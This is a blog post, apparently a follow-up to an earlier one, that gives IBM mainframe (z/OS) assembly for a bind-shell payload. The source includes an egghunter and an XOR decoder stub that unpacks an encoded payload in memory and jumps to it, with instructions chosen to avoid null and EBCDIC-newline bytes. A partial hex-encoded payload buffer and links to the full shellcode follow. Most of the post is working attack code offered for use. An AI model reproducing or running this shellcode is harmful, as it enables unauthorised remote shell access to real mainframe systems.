Bind Shell – shellcode and source

This is an addendum to the last post.  Here is shellcode (and it’s stripped down source) that achieve the same goal as the prior post.   The difference is the payload is XOR encoded and the shellcode, and it’s source, have a built in decoder stub that decodes the payload in memory then jumps to it.

If the payload decoder coding looks a bit obtuse, it’s because instructions and operands were chosen that have neither nulls “\x0” nor EBCDIC newlines “\x15” in them.

The code also includes an egghunter that finds the location of the payload in memory, in case they need to be separated.   You can read about egghunters here and here if you aren’t sure what that means.

         AFI   1,X'01010102'  # loading a 1 in R1
         AFI   2,X'01010103'  # loading a 1 in R1
         XR    1,2            # loading a 1 in R1
         LR    4,1            #  will put a 4 in R4
         SLA   4,1(1)         # make R1 == 4
         XR    10,10          # zeroout R10 for our egg
         XR    2,2            # zero 2
         LGFI  10,X'deadbeef' # load egghunter value into R10
         LR    11,12          # load  base int R11
LOOPER   AR    11,1           # add 1 to R11
         L     3,1(2,11)      # retrieve value at R11 +1 indexR2=0
         CR    10,3           # compare egg with R11 mem pointer
         BRC   7,LOOPER       # branch anything but equal
         AR    11,4
         L     3,1(2,11)      # retrieve value at R11 +1 indexR2=0
         CR    10,3           # compare egg with R11 mem pointer
         BRC   7,LOOPER       # 2nd check 2 in a row good to go!
         AR    11,1           # 1 for the offset from above
         SR    11,4           # 4 to skip last egg
         ST    13,4(,11)      # store old SP for later in wkg area
         ST    11,8(,13)      # store this in old wking area
         LR    13,11          # set up R13 pt to new wkg area
** End setup and stack management **
** Begin main decoding routine    **
         LR    3,11           # This is now our egghunter loc
         AR    3,4            # add 4 to 3
         AR    3,4            # R3 points to SC for decoding
         LR    5,3            # R5 points to SC for jumping to
         SR    3,1            # R3-1 to we can XI that addr w/o nulls
         SR    3,1            # R3-1 to we can XI that addr w/o nulls
         LR    4,1            # R4 has static 1
         XR    1,1            # R1 will be our byte counter
         XR    2,2            # R2 will be address pointer
LOOP1    AR    1,4            # add 1 to R1 byte counter
         ARK   2,3,1          # generate new address pointer
* put the XOR key  (enc buffer char) from below in the quotes below
         XI    1(2),X'4b'     # xor byte with key
* put the buffer len (num of bytes) in the next cmd in CHI 1,<here>
         CHI   1,2088         # to yield sc len
         BRC   4,LOOP1        # loop bwd 18 bytes if R1 < size
         XR    4,4
** Begin cleanup and stack management **
         L     13,4(4,11)     # reload old SP
         LM    6,4,12(13)     # restore registers
         BCR   15,5           # jmp to sc
** End main decoding routine    **
         DC    X'DEADBEEF'     #egg
         DC    X'DEADBEEF'     #egg + old sp
*******************************************************************
*Buffer length:      4176
*Number of bytes:    2088
*Enc buffer char:  0x4b
*ASM buffer:
         DC    X'dba79b478bbbb4b4b4b553448b0b4b4b48af1b9b0b4f539fecd34bX
               4aec834b4fecae487....................

Full source code on github
Shellcode version